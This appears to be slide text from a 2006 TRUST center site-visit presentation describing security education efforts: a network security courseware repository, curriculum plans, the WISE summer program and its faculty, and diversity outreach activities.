WEB-based dissemination

portal/content management system for

classroom resources: syllabi, lecture notes, readings, assessment materials, and instructor guides

re-targetable learning modules on-line learning resources: direct

access to courseware for evaluation

Network Security Courseware

Yuan Xue (Vanderbilt), Xiao Su (SJSU)

Sources– Vanderbilt’s CS291 (Network Security)– Stanford’s CS259 (Security Analysis

of Network Protocols)– SJSU’s CmpE209 (Network Security)

Network Security Course Modules How bad guys work

– Attacks from hackers’ perspective Cryptography

– Secret key, public key, hash functions Authentication protocols

– Key exchange protocols Network security standards

– Wireless security, IP security, SSL, ..


General Steps

Content creation Presentation & Packaging Learning Strategy Formalization Delivery methods Evangelization and dissemination Challenges

– Bringing in the policy-oriented educators– Bringing in the non-CS engineering disciplines– Evangelizing


Undergraduate Curriculum Refinement & Development

Develop (new) material for (new) domains Collect course material and teaching

experiences from the TRUST partners Identify knowledge units – generate

retargetable learning modules Define appropriate taxonomic structures


Facilitate Adoption of New Material

Security science (incremental, integrative, learning modules)– In-discipline: operating systems, programming languages, cryptography,

secure networking, hardware architectures…Canonical security courses

– Cross-discipline: Social impact, law, privacy, organizational roles, infrastructure

– Case studies as vehicle for learning modules Social sciences (incremental, integrative, learning modules)

– In-discipline: Privacy, information management and security, economics, organization theory, IP

– Cross-discipline: Fundamentals of security technologies, technology awareness

General Education – TRUST as a core competency for the educated person

Systems science (new capstone courses)– Cross-discipline: Design and analysis of complex systems

Courseware repository– Web-deliverable courseware – VaNTH/eLMS


Graduate Curriculum Refinement & Development

New courses will be jointly developed:– Design and Analysis of Secure Systems. – Integrative Systems Science

Advanced graduate seminars Computer and system security laboratory

– Team competitions New courses designed for engineering

audience; joint offering across partners using web-cast technology


Repository Content

Retargetable Learning Modules– Elements of the learning process

Courses– Teach security in a context


Learning Module Repository

Facilitate efficient reuse of courseware– Lectures– Projects– Homework assignments

Organized into small modules– May be incorporated into other courses

Example: The RSA module may be used in an algorithms class

Easy to adapt to different audiences– Same topics covered by different instructors in different

courses at different universities– Example: cryptography

Facilitate designing course architectures– The Lego approach to coursework design


Course Repository

Implement Course Repository in CAPE– Specify taxonomy– Define course learning objectives– Simulate learning process via sequencing of course modules– Include relevant resources in a course module

Lecture notes, Presentation slides Home assignments, Projects Exams, Quizzes

Web-based Delivery System – Hosted by VaNTH from Vanderbilt University– https://try.elms.vanth.org


Ongoing Work

Pilot module sets: Network security Introductory upper-division topics Security in chemical processing systems

Pilot experiment: Design a course on the basis of the repository

Establishing a broader community: Invite CERT, SEI, other IA institutions and initiatives

to make use of the repository and authoring tools. Establish a CSU-wide consortium for security

curriculum development


TRUST Education Workshops

Engaging the broader teaching community Work with CERT, the IA Capability Building effort and

minority serving institutions.

Immediate expectations: A TRUST/CERT sponsored participation in education

conferences (proposal with CMU, UC Berkeley, Vanderbilt and SJSU to the annual FIE Conference series)

A TRUST/SEI symposium following up on the SEI IA Education Summer Schools and the TRUST Summer Schools (proposal with SJSU and CMU/SEI under the NSF IACBP)


TRUST Workshops

Sensor Networking Workshop, Cornell and New York Department of Health - Tuesday, October 11, 2005.

Cornell-Tsinghua Workshop on Information Technology, November 18, Tsinghua University, Beijing, China. TRUST

Workshop on Social Security Numbers (jointly with PORTIA), Stanford – May 2006.


OUTREACH Strategy

We are engaged in two kinds of outreach activities:

Local, in which each local groups have their own outreach activities tailored to the local conditions.

Overall Center activities which engage the community at large. Here, we are most concerned how to disseminate our knowledge to the widest diverse population.


Local Activities

BFOIT - Berkeley Foundation for Opportunities in Information Technology http://www.bfoit.org/ (Nurturing underrepresented high school students and their teachers in TRUST areas. Prof. Bajcsy, personal participation and fund raising.)

SUPERB-IT - Summer Undergraduate Program in Engineering Research at Berkeley - Information Technologyhttp://www.eecs.berkeley.edu/Programs/ugrad/superb/superb.html (Increased number of underrepresented students by 4)

SIPHER - Summer Internship Program in Hybrid and Embedded Software Research http://fountain.isis.vanderbilt.edu/fountain/Teaching/ (Increased number of underrepresented students by 2)

Pennsylvania Area HBCU Outreach - Historically Black Colleges and Universities http://is.hss.cmu.edu/summer.html (Increased number of underrepresented students by 5)


Center Activities: WISE

Women’s Institute in Summer Enrichment (WISE) is a residential summer program on the University of California, Berkeley campus that brings together women (but it is not restricted to women only!) from all disciplines that are interested in TRUSTed systems in Science and Technology and all of the social, political, and economical ramifications that are associated with these systems.

Professors from across the country come to Berkeley to teach power courses in several disciplines, including computer science, economics, law, and electrical engineering. The one-week program includes rigorous classes in the morning, and allows participants to explore through hands-on experiments and team-based projects in the afternoons.


Application for the WISE program

Applications for summer 2006 are available on this website on the Application page (we shall shortly set this up). Our tuition fee for summer 2006 will be $1,500 -- applicants with financial need may request a fee waiver on the application form.

20 participants was selected from a nationwide applicant pool of young women and men who have demonstrated outstanding academic talent. No prior experience in computer programming, law, or engineering is required, but we expect students to be able to handle college-level material at a rapid pace. 19 out of the 20 participants are women (graduate students and junior faculty)


The currently signed up faculty for WISE

Name

Cynthia Dwork

Cynthia Irvine

Gail Kaiser

Jeanette Wing

Joan Feigenbaum

John Mitchell

Klara Nahrstedt

Rebecca Wright

Sonia Fahmy

Stephen Mauer

Steve Weber

Yuan Xue

Institution

Microsoft Palo Alto

Naval Postgraduate School

Columbia University

CMU

Yale University

Stanford University

UIUC

Stephen Institute of Technology

Purdue University

UC Berkeley

UC Berkeley

Vanderbilt


WISE Schedule

The workshop will be held at UC Berkeley Campus starting on July 5th ,06 until July 11th,06 included.

The summer school will be organized into two parts:Mornings 3 hours lectures;Afternoons 3 hours exercises.

The lectures will be given by the teachers listed above, the exercises will be supervised by graduate students.


Center Activities: National Visibility

Participation in National Conferences to build contacts and “get the word out”:

– Dr. W.Robinson from Vanderbilt University attended the NSF Joint Annual Meeting HER, on March 16-17th, 2006 in Washington, DC.,see : http://www.edjassociates.com/jam06

– Meltem Erol from UCB attended HBCU conference in February, 2006 in Baltimore, Md. See: http://www.hbcu-upconference.com/


Visiting positions

Cornell has funded Judy Cardell from Smith college to be engaged in the TRUST Sensor Networking project

TRUST funded Weider Yu from SJSU to participate in CMU’s Information Assurance Capacity Building Program (IACPB)

Stanford will host this summer professor Mario Garcia from Texas A&M University –Corpus Christi. This visit is sponsored by NSF Quality Education for Minorities (QEM) Program


Joint projects:

– Professor Bajcsy together with Prof. Nahrsted from UIUC, Prof. Wymur (UCB) and prof. Katherine Mezure form Mills college are building cyberinfrastructure for distributed dance performances in the Cyberspace

– Professor Xue from Vanderbilt and Professor Xiao Su at SJSU worked on a pilot project on designing network security courseware repository

Center Activities: National Visibility


Other OUTREACH plans

Organize regular TRUST seminars, weekly from a speaker pool (Researchers engaged in cyber security agenda)

Reach out to collaborate with the National Laboratories

Recruit diverse population of students as graduate students interested in TRUST agenda.

trust, berkeley site visit, april 26-28, 2006 year 1: research – education – outreach overview...

Documents

trust center

berkeley site visit

sites security

trust password theft

security secure info

research overview5 problem

science of computer

computer systems vulnerable